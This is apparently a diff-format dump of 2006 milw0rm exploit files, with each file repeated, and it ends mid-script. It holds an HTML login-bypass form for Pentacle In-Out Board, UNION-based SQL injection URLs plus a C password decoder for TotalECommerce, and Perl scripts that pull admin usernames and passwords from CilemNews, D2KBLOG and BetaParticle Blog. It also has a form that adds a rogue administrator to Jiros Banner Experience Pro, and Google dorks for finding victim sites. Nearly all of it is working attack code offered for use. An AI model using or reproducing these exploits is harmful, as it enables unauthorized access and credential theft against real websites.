<title>Pentacle In-Out Board <= 6.03 (login.asp) Authencation ByPass Vulnerability</title>
|
||||
<script language=javascript>
|
||||
function ptxpl(){
|
||||
if(document.xpl.victim.value=="") {
|
||||
alert("Please enter site!");
|
||||
return false;
|
||||
}
|
||||
if(confirm("Are you sure?")) {
|
||||
xpl.action="http://"+document.xpl.victim.value+"/login.asp";
|
||||
xpl.username.value=document.xpl.username.value;
|
||||
xpl.userpassword.value=document.xpl.userpassword.value;
|
||||
xpl.submit();
|
||||
}
|
||||
}
|
||||
</script>
|
||||
<strong>
|
||||
<font face="Tahoma" size="2">
|
||||
Fill in the blank !:D<br>
|
||||
Just enter host/path/ not http://host/path/!<br>
|
||||
If Pentacle installed on / just enter host<br>
|
||||
Example: host.com<br>
|
||||
Example2: host.com/ptdir/<br>
|
||||
<form name="xpl" method="POST" action="http://pentacle.g2soft.net/login.asp" onsubmit=ptxpl();>
|
||||
Target -> <input type="text" name="victim" value="pentacle.g2soft.net" size="50">
|
||||
<input type="hidden" name="username" value="any">
|
||||
<input type="hidden" name="userpassword" value="' or '1'='1">
|
||||
<input type="submit" value="Send">
|
||||
</table></form>
|
||||
</html>
|
||||
|
||||
Save this code as .htm and then execute.
|
||||
|
||||
# nukedx.com [2006-02-25]
|
||||
|
||||
# milw0rm.com [2006-02-25]
|
||||
<html>
|
||||
<title>Pentacle In-Out Board <= 6.03 (login.asp) Authencation ByPass Vulnerability</title>
|
||||
<script language=javascript>
|
||||
function ptxpl(){
|
||||
if(document.xpl.victim.value=="") {
|
||||
alert("Please enter site!");
|
||||
return false;
|
||||
}
|
||||
if(confirm("Are you sure?")) {
|
||||
xpl.action="http://"+document.xpl.victim.value+"/login.asp";
|
||||
xpl.username.value=document.xpl.username.value;
|
||||
xpl.userpassword.value=document.xpl.userpassword.value;
|
||||
xpl.submit();
|
||||
}
|
||||
}
|
||||
</script>
|
||||
<strong>
|
||||
<font face="Tahoma" size="2">
|
||||
Fill in the blank !:D<br>
|
||||
Just enter host/path/ not http://host/path/!<br>
|
||||
If Pentacle installed on / just enter host<br>
|
||||
Example: host.com<br>
|
||||
Example2: host.com/ptdir/<br>
|
||||
<form name="xpl" method="POST" action="http://pentacle.g2soft.net/login.asp" onsubmit=ptxpl();>
|
||||
Target -> <input type="text" name="victim" value="pentacle.g2soft.net" size="50">
|
||||
<input type="hidden" name="username" value="any">
|
||||
<input type="hidden" name="userpassword" value="' or '1'='1">
|
||||
<input type="submit" value="Send">
|
||||
</table></form>
|
||||
</html>
|
||||
|
||||
Save this code as .htm and then execute.
|
||||
|
||||
# nukedx.com [2006-02-25]
|
||||
|
||||
# milw0rm.com [2006-02-25]
|
||||
|
|
|
@ -1,66 +1,66 @@
|
|||
Original advisory: http://www.nukedx.com/?viewdoc=18
|
||||
Advisory by: nukedx
|
||||
Full PoC
|
||||
Explotation:
|
||||
GET -> http://[victim]/[dir]/index.asp?secao=[PageID]&id=[SQL]
|
||||
EXAMPLE 1 -> http://[victim]/[dir]/index.asp?secao=25&id=-1+UNION+select+senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha+from+administradores
|
||||
EXAMPLE 2 -> http://[victim]/[dir]/index.asp?secao=25&id=-1+UNION+select+login,login,login,login,login,login,login,login,login,login,login,login,login,login,login,login,login,login,login,login,login,login,login,login,login,login,login,login,login,login,login,login,login+from+administradores
|
||||
with example 1 remote attacker can get admin's encrypted password and with example 2 remote attacker can get admin's login name
|
||||
[PageID]: must be working page id you can get some from frontpage.
|
||||
<--Decrypter code-->
|
||||
<--Note: This decrypter just decrypts default data
|
||||
If webmaster changed te_chave value in funcoes.asp
|
||||
this decrypter wont decrypt data so you need to
|
||||
make your own decrypter
|
||||
-->
|
||||
<--C Source-->
|
||||
/*********************************************
|
||||
* TotalECommerce PWD Decrypter *
|
||||
* Coded by |SaMaN| for nukedx *
|
||||
* http://www.k9world.org *
|
||||
* IRC.K9World.Org *
|
||||
*Advisory: http://www.nukedx.com/?viewdoc=18 *
|
||||
**********************************************/
|
||||
#include <stdio.h>
|
||||
#include <stdlib.h>
|
||||
#include <string.h>
|
||||
#include <ctype.h>
|
||||
|
||||
int main()
|
||||
{
|
||||
char buf[255];
|
||||
char buf2[255];
|
||||
char buf3[255];
|
||||
char *texto;
|
||||
char *vcrypt;
|
||||
int i,x,z,t = 0;
|
||||
char saman;
|
||||
texto = buf;
|
||||
vcrypt = buf2;
|
||||
printf("%s", "|=------------------------------------=|\n");
|
||||
printf("%s", " Coded by |SaMaN| @ IRC.K9World.Org\n");
|
||||
printf("%s", "|=------------------------------------=|\n\n");
|
||||
printf("%s", "Enter crypted password: ");
|
||||
scanf("%200s", buf);
|
||||
if (!texto)
|
||||
vcrypt = "";
|
||||
|
||||
for (i = 0; i < strlen(texto); i++)
|
||||
{
|
||||
if ((vcrypt == "") || (i > strlen(texto)))
|
||||
x = 1;
|
||||
else
|
||||
x = x + 1;
|
||||
t = buf[i];
|
||||
z = 255 - t;
|
||||
saman = toascii(z);
|
||||
snprintf(buf3, 250, "%c", saman);
|
||||
strncat(buf2, buf3, 250);
|
||||
}
|
||||
printf("Result: %s\n", buf2);
|
||||
return;
|
||||
}
|
||||
<--End of code-->
|
||||
<--Thanks |SaMaN| for decrypter-->
|
||||
|
||||
// milw0rm.com [2006-03-04]
|
||||
Original advisory: http://www.nukedx.com/?viewdoc=18
|
||||
Advisory by: nukedx
|
||||
Full PoC
|
||||
Explotation:
|
||||
GET -> http://[victim]/[dir]/index.asp?secao=[PageID]&id=[SQL]
|
||||
EXAMPLE 1 -> http://[victim]/[dir]/index.asp?secao=25&id=-1+UNION+select+senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha+from+administradores
|
||||
EXAMPLE 2 -> http://[victim]/[dir]/index.asp?secao=25&id=-1+UNION+select+login,login,login,login,login,login,login,login,login,login,login,login,login,login,login,login,login,login,login,login,login,login,login,login,login,login,login,login,login,login,login,login,login+from+administradores
|
||||
with example 1 remote attacker can get admin's encrypted password and with example 2 remote attacker can get admin's login name
|
||||
[PageID]: must be working page id you can get some from frontpage.
|
||||
<--Decrypter code-->
|
||||
<--Note: This decrypter just decrypts default data
|
||||
If webmaster changed te_chave value in funcoes.asp
|
||||
this decrypter wont decrypt data so you need to
|
||||
make your own decrypter
|
||||
-->
|
||||
<--C Source-->
|
||||
/*********************************************
|
||||
* TotalECommerce PWD Decrypter *
|
||||
* Coded by |SaMaN| for nukedx *
|
||||
* http://www.k9world.org *
|
||||
* IRC.K9World.Org *
|
||||
*Advisory: http://www.nukedx.com/?viewdoc=18 *
|
||||
**********************************************/
|
||||
#include <stdio.h>
|
||||
#include <stdlib.h>
|
||||
#include <string.h>
|
||||
#include <ctype.h>
|
||||
|
||||
int main()
|
||||
{
|
||||
char buf[255];
|
||||
char buf2[255];
|
||||
char buf3[255];
|
||||
char *texto;
|
||||
char *vcrypt;
|
||||
int i,x,z,t = 0;
|
||||
char saman;
|
||||
texto = buf;
|
||||
vcrypt = buf2;
|
||||
printf("%s", "|=------------------------------------=|\n");
|
||||
printf("%s", " Coded by |SaMaN| @ IRC.K9World.Org\n");
|
||||
printf("%s", "|=------------------------------------=|\n\n");
|
||||
printf("%s", "Enter crypted password: ");
|
||||
scanf("%200s", buf);
|
||||
if (!texto)
|
||||
vcrypt = "";
|
||||
|
||||
for (i = 0; i < strlen(texto); i++)
|
||||
{
|
||||
if ((vcrypt == "") || (i > strlen(texto)))
|
||||
x = 1;
|
||||
else
|
||||
x = x + 1;
|
||||
t = buf[i];
|
||||
z = 255 - t;
|
||||
saman = toascii(z);
|
||||
snprintf(buf3, 250, "%c", saman);
|
||||
strncat(buf2, buf3, 250);
|
||||
}
|
||||
printf("Result: %s\n", buf2);
|
||||
return;
|
||||
}
|
||||
<--End of code-->
|
||||
<--Thanks |SaMaN| for decrypter-->
|
||||
|
||||
// milw0rm.com [2006-03-04]
|
||||
|
|
|
@ -1,68 +1,68 @@
|
|||
#!/usr/bin/perl
|
||||
#Method found & Exploit scripted by nukedx
|
||||
#Contacts > ICQ: 10072 MSN/Main: nukedx@nukedx.com web: www.nukedx.com
|
||||
#Usage: cilem.pl <victim> <directory>
|
||||
#Original Advisory: http://www.nukedx.com/?viewdoc=10
|
||||
#googledork [ inurl:yazdir.asp?haber_id= ] 2.140 pages...
|
||||
use IO::Socket;
|
||||
if(@ARGV < 2){
|
||||
print "
|
||||
+***********************************************************************+
|
||||
+Welcome to CilemNews System <= 1.1 (yazdir.asp haber_id) SQL-inject xpl+
|
||||
+ Usage: cilem.pl <victim> <directory> +
|
||||
+ Example: cilem.pl sux.com / +
|
||||
+ googledork [ inurl:yazdir.asp?haber_id= ] +
|
||||
+ Method found & Exploit scripted by nukedx +
|
||||
+***********************************************************************+
|
||||
";
|
||||
exit();
|
||||
}
|
||||
#Local variables
|
||||
$cilemserver = $ARGV[0];
|
||||
$cilemserver =~ s/(http:\/\/)//eg;
|
||||
$cilemhost = "http://".$cilemserver;
|
||||
$port = "80";
|
||||
$cilemdir = $ARGV[1];
|
||||
$cilemtar = "yazdir.asp?haber_id=";
|
||||
$cilemfinal = "admin/giris.asp";
|
||||
$cilemxp = "1%20union%20select%200,admin,sifre,0,0,0,0,0,0,0,0,0,0,0%20from%20ayarlar%20where%20admin=admin";
|
||||
$cilemreq = $cilemhost.$cilemdir.$cilemtar.$cilemxp;
|
||||
#Writing data to socket
|
||||
print "+**********************************************************************+\n";
|
||||
print "+ Trying to connect: $cilemserver\n";
|
||||
$cilem = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$cilemserver", PeerPort => "$port") || die "\n+ Connection failed...\n";
|
||||
print $cilem "GET $cilemreq\n";
|
||||
print $cilem "Host: $cilemserver\n";
|
||||
print $cilem "Accept: */*\n";
|
||||
print $cilem "Connection: close\n\n";
|
||||
print "+ Connected!...\n";
|
||||
while($answer = <$cilem>) {
|
||||
if ($answer =~ /font-weight:700\">(.*?)<\/b><\/td>/){
|
||||
print "+ Exploit succeed! Getting admin's information.\n";
|
||||
print "+ ---------------- +\n";
|
||||
print "+ USERNAME: $1\n";
|
||||
}
|
||||
if ($answer =~ /(.*?)<\/font><\/td>/) {
|
||||
print "+ PASSWORD: $1\n";
|
||||
print "+ ---------------- +\n";
|
||||
print "+ Lets go $cilemhost$cilemdir$cilemfinal and\n+ Login with this information. \n";
|
||||
print "+**********************************************************************+\n";
|
||||
exit();
|
||||
}
|
||||
if ($answer =~ /Internal Server Error/) {
|
||||
print "+ This version of CilemNews is vulnerable too but default query of SQL-inject doesnt work on it\n";
|
||||
print "+ So please edit query by manually adding or removing null datas..\n";
|
||||
print "+**********************************************************************+\n";
|
||||
exit();
|
||||
}
|
||||
if ($answer =~ /number of columns/) {
|
||||
print "+ This version of CilemNews is vulnerable too but default query of SQL-inject doesnt work on it\n";
|
||||
print "+ So please edit query by manually adding or removing null datas..\n";
|
||||
print "+**********************************************************************+\n";
|
||||
exit();
|
||||
}
|
||||
}
|
||||
print "+ Exploit failed :(\n";
|
||||
print "+**********************************************************************+\n";
|
||||
|
||||
# milw0rm.com [2006-03-07]
|
||||
#!/usr/bin/perl
|
||||
#Method found & Exploit scripted by nukedx
|
||||
#Contacts > ICQ: 10072 MSN/Main: nukedx@nukedx.com web: www.nukedx.com
|
||||
#Usage: cilem.pl <victim> <directory>
|
||||
#Original Advisory: http://www.nukedx.com/?viewdoc=10
|
||||
#googledork [ inurl:yazdir.asp?haber_id= ] 2.140 pages...
|
||||
use IO::Socket;
|
||||
if(@ARGV < 2){
|
||||
print "
|
||||
+***********************************************************************+
|
||||
+Welcome to CilemNews System <= 1.1 (yazdir.asp haber_id) SQL-inject xpl+
|
||||
+ Usage: cilem.pl <victim> <directory> +
|
||||
+ Example: cilem.pl sux.com / +
|
||||
+ googledork [ inurl:yazdir.asp?haber_id= ] +
|
||||
+ Method found & Exploit scripted by nukedx +
|
||||
+***********************************************************************+
|
||||
";
|
||||
exit();
|
||||
}
|
||||
#Local variables
|
||||
$cilemserver = $ARGV[0];
|
||||
$cilemserver =~ s/(http:\/\/)//eg;
|
||||
$cilemhost = "http://".$cilemserver;
|
||||
$port = "80";
|
||||
$cilemdir = $ARGV[1];
|
||||
$cilemtar = "yazdir.asp?haber_id=";
|
||||
$cilemfinal = "admin/giris.asp";
|
||||
$cilemxp = "1%20union%20select%200,admin,sifre,0,0,0,0,0,0,0,0,0,0,0%20from%20ayarlar%20where%20admin=admin";
|
||||
$cilemreq = $cilemhost.$cilemdir.$cilemtar.$cilemxp;
|
||||
#Writing data to socket
|
||||
print "+**********************************************************************+\n";
|
||||
print "+ Trying to connect: $cilemserver\n";
|
||||
$cilem = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$cilemserver", PeerPort => "$port") || die "\n+ Connection failed...\n";
|
||||
print $cilem "GET $cilemreq\n";
|
||||
print $cilem "Host: $cilemserver\n";
|
||||
print $cilem "Accept: */*\n";
|
||||
print $cilem "Connection: close\n\n";
|
||||
print "+ Connected!...\n";
|
||||
while($answer = <$cilem>) {
|
||||
if ($answer =~ /font-weight:700\">(.*?)<\/b><\/td>/){
|
||||
print "+ Exploit succeed! Getting admin's information.\n";
|
||||
print "+ ---------------- +\n";
|
||||
print "+ USERNAME: $1\n";
|
||||
}
|
||||
if ($answer =~ /(.*?)<\/font><\/td>/) {
|
||||
print "+ PASSWORD: $1\n";
|
||||
print "+ ---------------- +\n";
|
||||
print "+ Lets go $cilemhost$cilemdir$cilemfinal and\n+ Login with this information. \n";
|
||||
print "+**********************************************************************+\n";
|
||||
exit();
|
||||
}
|
||||
if ($answer =~ /Internal Server Error/) {
|
||||
print "+ This version of CilemNews is vulnerable too but default query of SQL-inject doesnt work on it\n";
|
||||
print "+ So please edit query by manually adding or removing null datas..\n";
|
||||
print "+**********************************************************************+\n";
|
||||
exit();
|
||||
}
|
||||
if ($answer =~ /number of columns/) {
|
||||
print "+ This version of CilemNews is vulnerable too but default query of SQL-inject doesnt work on it\n";
|
||||
print "+ So please edit query by manually adding or removing null datas..\n";
|
||||
print "+**********************************************************************+\n";
|
||||
exit();
|
||||
}
|
||||
}
|
||||
print "+ Exploit failed :(\n";
|
||||
print "+**********************************************************************+\n";
|
||||
|
||||
# milw0rm.com [2006-03-07]
|
||||
|
|
|
@ -1,55 +1,55 @@
|
|||
#!/usr/bin/perl -w
|
||||
# D2KBLOG SQL injection
|
||||
# Discovered by : Farhad Koosha [ farhadkey [at} kapda.ir ]
|
||||
# Exploited by : devil_box [ devil_box [at} kapda.ir ]
|
||||
# member of : Kapda.ir - Security Science Researchers Institute of Iran (persianhacker.net)
|
||||
|
||||
require LWP::UserAgent;
|
||||
require HTTP::Request;
|
||||
print "\r\n\r\n=-=-=-==================================================================-=-=-=\r\n\r\n";
|
||||
print " KAPDA - Security Science Researchers Institute of Iran\r\n\r\n";
|
||||
print " PoC for D2KBLOG SQL injection bug - Administrator Password Extractor\r\n\r\n";
|
||||
print " Original Source : http://kapda.ir/advisory-287.html (persianhacker.net)\r\n\r\n";
|
||||
print "\r\n=-=-=-==================================================================-=-=-=\r\n";
|
||||
|
||||
if (@ARGV != 2)
|
||||
{
|
||||
print " Usage: kapda_D2KBLOG_xpl.pl [Target Domain] [Vulnerable Page]\n\r\n";
|
||||
print " ex: kapda_D2KBLOG_xpl.pl www.target.com /blog/profile.asp\n\r\n";
|
||||
exit ();
|
||||
}
|
||||
|
||||
|
||||
my $ua = LWP::UserAgent->new(env_proxy => 1,keep_alive => 1,timeout => 30,);
|
||||
|
||||
my $Path = $ARGV[0];
|
||||
|
||||
my $Page = $ARGV[1];
|
||||
|
||||
my $URL = "http://".$Path.$Page;
|
||||
|
||||
print "|***| Connecting to ".$URL." ...\r\n";
|
||||
|
||||
$r = HTTP::Request->new(GET => $URL."?action=edit");
|
||||
|
||||
$r->header( "Cookie" =>$Path."=memPassword=&memStatus=&memName=<!--'UNION%20ALL%20select%201,1,1,'**stxt**|UserName|:|'%2bmem_name%2b'|-=-|Password|:|'%2bmem_password%2b'|**etxt**',1,1,1,1,1,1,1,1,'Discovered%20and%20coded%20by%20farhadkey%20from%20KAPDA.ir'%20from%20blog_member%20where%20mem_status='SupAdmin'%20or%20'1'='-->" );
|
||||
|
||||
$res = $ua->request($r);
|
||||
|
||||
print "|***| Connected !\r\n";
|
||||
|
||||
if ($res->is_success) {
|
||||
|
||||
print "|***| Extracting Username and Password ...\r\n\r\n";
|
||||
|
||||
my $results = $res->content;
|
||||
|
||||
while($results=~/\"\*\*stxt\*\*(.*?)\*\*etxt\*\*\"/ig){ print "-=-> $1 \r\n"; }
|
||||
|
||||
print "\r\n Exploit by Devil_Box\r\n Discovery by Farhad koosha\r\n\r\n";
|
||||
|
||||
} else {
|
||||
die "\r\n|***| ".$res->status_line;
|
||||
}
|
||||
|
||||
# milw0rm.com [2006-03-09]
|
||||
#!/usr/bin/perl -w
|
||||
# D2KBLOG SQL injection
|
||||
# Discovered by : Farhad Koosha [ farhadkey [at} kapda.ir ]
|
||||
# Exploited by : devil_box [ devil_box [at} kapda.ir ]
|
||||
# member of : Kapda.ir - Security Science Researchers Institute of Iran (persianhacker.net)
|
||||
|
||||
require LWP::UserAgent;
|
||||
require HTTP::Request;
|
||||
print "\r\n\r\n=-=-=-==================================================================-=-=-=\r\n\r\n";
|
||||
print " KAPDA - Security Science Researchers Institute of Iran\r\n\r\n";
|
||||
print " PoC for D2KBLOG SQL injection bug - Administrator Password Extractor\r\n\r\n";
|
||||
print " Original Source : http://kapda.ir/advisory-287.html (persianhacker.net)\r\n\r\n";
|
||||
print "\r\n=-=-=-==================================================================-=-=-=\r\n";
|
||||
|
||||
if (@ARGV != 2)
|
||||
{
|
||||
print " Usage: kapda_D2KBLOG_xpl.pl [Target Domain] [Vulnerable Page]\n\r\n";
|
||||
print " ex: kapda_D2KBLOG_xpl.pl www.target.com /blog/profile.asp\n\r\n";
|
||||
exit ();
|
||||
}
|
||||
|
||||
|
||||
my $ua = LWP::UserAgent->new(env_proxy => 1,keep_alive => 1,timeout => 30,);
|
||||
|
||||
my $Path = $ARGV[0];
|
||||
|
||||
my $Page = $ARGV[1];
|
||||
|
||||
my $URL = "http://".$Path.$Page;
|
||||
|
||||
print "|***| Connecting to ".$URL." ...\r\n";
|
||||
|
||||
$r = HTTP::Request->new(GET => $URL."?action=edit");
|
||||
|
||||
$r->header( "Cookie" =>$Path."=memPassword=&memStatus=&memName=<!--'UNION%20ALL%20select%201,1,1,'**stxt**|UserName|:|'%2bmem_name%2b'|-=-|Password|:|'%2bmem_password%2b'|**etxt**',1,1,1,1,1,1,1,1,'Discovered%20and%20coded%20by%20farhadkey%20from%20KAPDA.ir'%20from%20blog_member%20where%20mem_status='SupAdmin'%20or%20'1'='-->" );
|
||||
|
||||
$res = $ua->request($r);
|
||||
|
||||
print "|***| Connected !\r\n";
|
||||
|
||||
if ($res->is_success) {
|
||||
|
||||
print "|***| Extracting Username and Password ...\r\n\r\n";
|
||||
|
||||
my $results = $res->content;
|
||||
|
||||
while($results=~/\"\*\*stxt\*\*(.*?)\*\*etxt\*\*\"/ig){ print "-=-> $1 \r\n"; }
|
||||
|
||||
print "\r\n Exploit by Devil_Box\r\n Discovery by Farhad koosha\r\n\r\n";
|
||||
|
||||
} else {
|
||||
die "\r\n|***| ".$res->status_line;
|
||||
}
|
||||
|
||||
# milw0rm.com [2006-03-09]
|
||||
|
|
|
@ -1,57 +1,57 @@
|
|||
<html>
|
||||
<title>Jiros Banner Experience Pro Unauthorized Admin Add Exploit</title>
|
||||
<body bgcolor="#000000">
|
||||
<style>
|
||||
.xpl {font-family:tahoma; font-size:11px; text-decoration: none;}
|
||||
</style>
|
||||
<script language="JavaScript">
|
||||
function jbxpl() {
|
||||
if (document.xplt.victim.value=="") {
|
||||
alert("Please enter site!");
|
||||
return false;
|
||||
}
|
||||
if (confirm("Are you sure?")) {
|
||||
xplt.action="http://"+document.xplt.victim.value+"files/update.asp?Action=AddAdmin";
|
||||
xplt.aName.value=document.xplt.aName.value;
|
||||
xplt.aEmail.value=document.xplt.aEmail.value;
|
||||
xplt.aPassword.value=document.xplt.aPassword.value;
|
||||
xplt.aIsSystemAdmin=document.xplt.aIsSystemAdmin.value;
|
||||
xplt.aIsActive=document.xplt.aIsActive.value;
|
||||
xplt.submit();
|
||||
}
|
||||
}
|
||||
</script>
|
||||
<strong>
|
||||
<font class="xpl" color="#00FF40">
|
||||
<pre>
|
||||
<center>
|
||||
Welcome to Jiros Banner Experience Pro Unauthorized Admin Add Exploit
|
||||
This exploit has been coded by nukedx
|
||||
You can found original advisory on http://www.nukedx.com/?viewdoc=19
|
||||
Dork for this exploit: <u>inurl:JBSPro</u>
|
||||
Your target must be like that: www.victim.com/Path/
|
||||
The sites you found with given dork has like: www.victim.com/JBSPro/files or www.victim.com/JBSPro.asp
|
||||
If the site has /JBSPro/files in link your target must be www.victim.com/JBSPro/
|
||||
For second example your target must be www.victim.com/
|
||||
You can login with your admin account via www.victim.com/JBSPath/files/login.asp
|
||||
Have phun
|
||||
<form name="xplt" method="POST" onsubmit="jbxpl();">
|
||||
Target -> <input type="text" name="victim" value="www.victim.com/Path/" size="44" class="xpl">
|
||||
<input type="text" name="aName" value="Enter Username" class="xpl" size="30">
|
||||
<input type="text" name="aEmail" value="Enter Email" class="xpl" size="30">
|
||||
<input type="text" name="aPassword" value="Enter Password" class="xpl" size="30">
|
||||
<input type="hidden" name="aIsSystemAdmin" value="True">
|
||||
<input type="hidden" name="aIsActive" value="True">
|
||||
<input type="submit" value="Send" class="xpl">
|
||||
</form>
|
||||
</pre>
|
||||
</font>
|
||||
</strong>
|
||||
</body>
|
||||
</html>
|
||||
|
||||
Save this code as .htm and then execute.
|
||||
|
||||
# nukedx.com [2006-03-07]
|
||||
|
||||
# milw0rm.com [2006-03-09]
|
||||
<html>
|
||||
<title>Jiros Banner Experience Pro Unauthorized Admin Add Exploit</title>
|
||||
<body bgcolor="#000000">
|
||||
<style>
|
||||
.xpl {font-family:tahoma; font-size:11px; text-decoration: none;}
|
||||
</style>
|
||||
<script language="JavaScript">
|
||||
function jbxpl() {
|
||||
if (document.xplt.victim.value=="") {
|
||||
alert("Please enter site!");
|
||||
return false;
|
||||
}
|
||||
if (confirm("Are you sure?")) {
|
||||
xplt.action="http://"+document.xplt.victim.value+"files/update.asp?Action=AddAdmin";
|
||||
xplt.aName.value=document.xplt.aName.value;
|
||||
xplt.aEmail.value=document.xplt.aEmail.value;
|
||||
xplt.aPassword.value=document.xplt.aPassword.value;
|
||||
xplt.aIsSystemAdmin=document.xplt.aIsSystemAdmin.value;
|
||||
xplt.aIsActive=document.xplt.aIsActive.value;
|
||||
xplt.submit();
|
||||
}
|
||||
}
|
||||
</script>
|
||||
<strong>
|
||||
<font class="xpl" color="#00FF40">
|
||||
<pre>
|
||||
<center>
|
||||
Welcome to Jiros Banner Experience Pro Unauthorized Admin Add Exploit
|
||||
This exploit has been coded by nukedx
|
||||
You can found original advisory on http://www.nukedx.com/?viewdoc=19
|
||||
Dork for this exploit: <u>inurl:JBSPro</u>
|
||||
Your target must be like that: www.victim.com/Path/
|
||||
The sites you found with given dork has like: www.victim.com/JBSPro/files or www.victim.com/JBSPro.asp
|
||||
If the site has /JBSPro/files in link your target must be www.victim.com/JBSPro/
|
||||
For second example your target must be www.victim.com/
|
||||
You can login with your admin account via www.victim.com/JBSPath/files/login.asp
|
||||
Have phun
|
||||
<form name="xplt" method="POST" onsubmit="jbxpl();">
|
||||
Target -> <input type="text" name="victim" value="www.victim.com/Path/" size="44" class="xpl">
|
||||
<input type="text" name="aName" value="Enter Username" class="xpl" size="30">
|
||||
<input type="text" name="aEmail" value="Enter Email" class="xpl" size="30">
|
||||
<input type="text" name="aPassword" value="Enter Password" class="xpl" size="30">
|
||||
<input type="hidden" name="aIsSystemAdmin" value="True">
|
||||
<input type="hidden" name="aIsActive" value="True">
|
||||
<input type="submit" value="Send" class="xpl">
|
||||
</form>
|
||||
</pre>
|
||||
</font>
|
||||
</strong>
|
||||
</body>
|
||||
</html>
|
||||
|
||||
Save this code as .htm and then execute.
|
||||
|
||||
# nukedx.com [2006-03-07]
|
||||
|
||||
# milw0rm.com [2006-03-09]
|
||||
|
|
|
@ -1,67 +1,67 @@
|
|||
#!/usr/bin/perl
|
||||
#Method found & Exploit scripted by nukedx
|
||||
#Contacts > ICQ: 10072 MSN/Main: nukedx@nukedx.com web: www.nukedx.com
|
||||
#Original advisory: http://www.nukedx.com/?viewdoc=20
|
||||
#Usage: beta.pl <host> <path>
|
||||
#googledork: [ "Powered by bp blog" ] 9.710 pages..
|
||||
use IO::Socket;
|
||||
if(@ARGV != 2) { usage(); }
|
||||
else { exploit(); }
|
||||
sub header()
|
||||
{
|
||||
print "\n- NukedX Security Advisory Nr.2006-20\r\n";
|
||||
print "- BetaParticle Blog <= 6.0 Remote SQL Injection Vulnerability\r\n";
|
||||
}
|
||||
sub usage()
|
||||
{
|
||||
header();
|
||||
print "- Usage: $0 <host> <path>\r\n";
|
||||
print "- <host> -> Victim's host ex: www.victim.com\r\n";
|
||||
print "- <path> -> Path to BetaParticle ex: /blog\r\n";
|
||||
exit();
|
||||
}
|
||||
sub exploit () {
|
||||
#Our variables...
|
||||
$bpserver = $ARGV[0];
|
||||
$bpserver =~ s/(http:\/\/)//eg;
|
||||
$bphost = "http://".$bpserver;
|
||||
$bpdir = $ARGV[1];
|
||||
$bpport = "80";
|
||||
$bptar = "template_gallery_detail.asp?fldGalleryID=";
|
||||
$bpfinal = "main.asp";
|
||||
$bpxp = "-1+UNION+SELECT+null,fldAuthorUsername,fldAuthorPassword,null,null+FROM+tblAuthor+where+fldAuthorId=1";
|
||||
$bpreq = $bphost.$bpdir.$bptar.$bpxp;
|
||||
#Sending data...
|
||||
header();
|
||||
print "- Trying to connect: $bpserver\r\n";
|
||||
$bp = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$bpserver", PeerPort => "$bpport") || die "- Connection failed...\n";
|
||||
print $bp "GET $bpreq HTTP/1.1\n";
|
||||
print $bp "Accept: */*\n";
|
||||
print $bp "Referer: $bphost\n";
|
||||
print $bp "Accept-Language: tr\n";
|
||||
print $bp "User-Agent: NukeZilla 4.3\n";
|
||||
print $bp "Cache-Control: no-cache\n";
|
||||
print $bp "Host: $bpserver\n";
|
||||
print $bp "Connection: close\n\n";
|
||||
print "- Connected...\r\n";
|
||||
while ($answer = <$bp>) {
|
||||
if ($answer =~ /<h3>(.*?)<\/h3>/) {
|
||||
print "- Exploit succeed! Getting admin's information\r\n";
|
||||
print "- Username: $1\r\n";
|
||||
}
|
||||
if ($answer =~ /<p>(.*?)<\/p>/) {
|
||||
print "- Password: $1\r\n";
|
||||
print "- Lets go $bphost$bpdir$bpfinal for admin login.\r\n";
|
||||
exit();
|
||||
}
|
||||
if ($answer =~ /number of columns/) {
|
||||
print "- This version of BetaParticle is vulnerable too\r\n";
|
||||
print "- but default query of SQL-Inj. does not work on it\r\n";
|
||||
print "- So please edit query by manually adding null data..\r\n";
|
||||
exit();
|
||||
}
|
||||
}
|
||||
print "- Exploit failed\n"
|
||||
}
|
||||
|
||||
# milw0rm.com [2006-03-18]
|
||||
#!/usr/bin/perl
|
||||
#Method found & Exploit scripted by nukedx
|
||||
#Contacts > ICQ: 10072 MSN/Main: nukedx@nukedx.com web: www.nukedx.com
|
||||
#Original advisory: http://www.nukedx.com/?viewdoc=20
|
||||
#Usage: beta.pl <host> <path>
|
||||
#googledork: [ "Powered by bp blog" ] 9.710 pages..
|
||||
use IO::Socket;
|
||||
if(@ARGV != 2) { usage(); }
|
||||
else { exploit(); }
|
||||
sub header()
|
||||
{
|
||||
print "\n- NukedX Security Advisory Nr.2006-20\r\n";
|
||||
print "- BetaParticle Blog <= 6.0 Remote SQL Injection Vulnerability\r\n";
|
||||
}
|
||||
sub usage()
|
||||
{
|
||||
header();
|
||||
print "- Usage: $0 <host> <path>\r\n";
|
||||
print "- <host> -> Victim's host ex: www.victim.com\r\n";
|
||||
print "- <path> -> Path to BetaParticle ex: /blog\r\n";
|
||||
exit();
|
||||
}
|
||||
sub exploit () {
|
||||
#Our variables...
|
||||
$bpserver = $ARGV[0];
|
||||
$bpserver =~ s/(http:\/\/)//eg;
|
||||
$bphost = "http://".$bpserver;
|
||||
$bpdir = $ARGV[1];
|
||||
$bpport = "80";
|
||||
$bptar = "template_gallery_detail.asp?fldGalleryID=";
|
||||
$bpfinal = "main.asp";
|
||||
$bpxp = "-1+UNION+SELECT+null,fldAuthorUsername,fldAuthorPassword,null,null+FROM+tblAuthor+where+fldAuthorId=1";
|
||||
$bpreq = $bphost.$bpdir.$bptar.$bpxp;
|
||||
#Sending data...
|
||||
header();
|
||||
print "- Trying to connect: $bpserver\r\n";
|
||||
$bp = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$bpserver", PeerPort => "$bpport") || die "- Connection failed...\n";
|
||||
print $bp "GET $bpreq HTTP/1.1\n";
|
||||
print $bp "Accept: */*\n";
|
||||
print $bp "Referer: $bphost\n";
|
||||
print $bp "Accept-Language: tr\n";
|
||||
print $bp "User-Agent: NukeZilla 4.3\n";
|
||||
print $bp "Cache-Control: no-cache\n";
|
||||
print $bp "Host: $bpserver\n";
|
||||
print $bp "Connection: close\n\n";
|
||||
print "- Connected...\r\n";
|
||||
while ($answer = <$bp>) {
|
||||
if ($answer =~ /<h3>(.*?)<\/h3>/) {
|
||||
